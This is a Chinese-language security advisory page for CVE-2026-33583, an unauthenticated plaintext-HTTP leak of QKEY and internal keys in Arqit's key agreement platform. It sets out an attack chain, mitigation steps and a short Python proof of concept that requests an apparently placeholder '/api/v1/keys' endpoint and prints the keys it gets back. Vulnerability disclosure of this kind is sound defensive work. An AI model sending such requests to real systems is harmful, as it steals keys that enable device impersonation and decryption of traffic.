IPBUF安全漏洞报告
English
CVE-2026-33583 CVSS 8.7 高危

CVE-2026-33583 Arqit平台敏感信息泄露漏洞

披露日期: 2026-05-13
来源: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

漏洞信息

漏洞编号
CVE-2026-33583
漏洞类型
信息泄露
CVSS评分
8.7 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Arqit Symmetric Key Agreement Platform

相关标签

信息泄露Arqit敏感数据未授权访问

漏洞概述

Arqit对称密钥协商平台在26.03版本之前存在严重的信息泄露漏洞。由于系统配置错误,攻击者可通过未认证且未加密的HTTP GET请求直接获取QKEY及内部系统密钥。这些密钥用于“OTA-Quantum”设备注册,泄露后可能导致攻击者伪造设备身份或解密通信数据,严重威胁系统安全。

技术细节

该漏洞的根本原因在于Arqit Symmetric Key Agreement Platform未能对敏感接口实施严格的访问控制和加密传输机制。具体而言,系统暴露了用于'OTA-Quantum'设备注册流程的QKEY以及内部系统密钥。攻击者无需进行身份验证(PR:N),只需向目标服务器发送特定的HTTP GET请求,即可通过明文HTTP协议(非HTTPS)获取这些关键凭证。由于CVSS向量中S:C(范围变更),一旦密钥泄露,不仅当前系统受影响,攻击者还可能利用这些密钥访问或破坏其他依赖该密钥管理的下游系统,导致机密性和完整性受损。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出运行Arqit Symmetric Key Agreement Platform且版本低于26.03的目标主机。
STEP 2
漏洞利用
攻击者构造特定的HTTP GET请求,直接访问暴露QKEY和内部系统密钥的未认证端点。
STEP 3
数据窃取
服务器响应请求,通过未加密的HTTP连接返回敏感的QKEY和系统密钥,攻击者成功获取数据。
STEP 4
后续攻击
攻击者利用获取的QKEY伪造设备进行恶意注册,或使用内部密钥解密系统通信,进一步渗透网络。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target vulnerable endpoint (replace with actual target URL) target_url = "http://<TARGET_IP>/api/v1/keys" try: # Send unauthenticated HTTP GET request response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Response content (Keys/Secrets):") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}")

影响范围

Arqit Symmetric Key Agreement Platform < 26.03

防御指南

临时缓解措施
如果无法立即升级,请通过网络防火墙或安全组严格限制对相关端口的访问,仅允许受信任的内部IP地址连接。同时,检查并轮换已泄露的QKEY和内部系统密钥,以减少潜在的安全风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表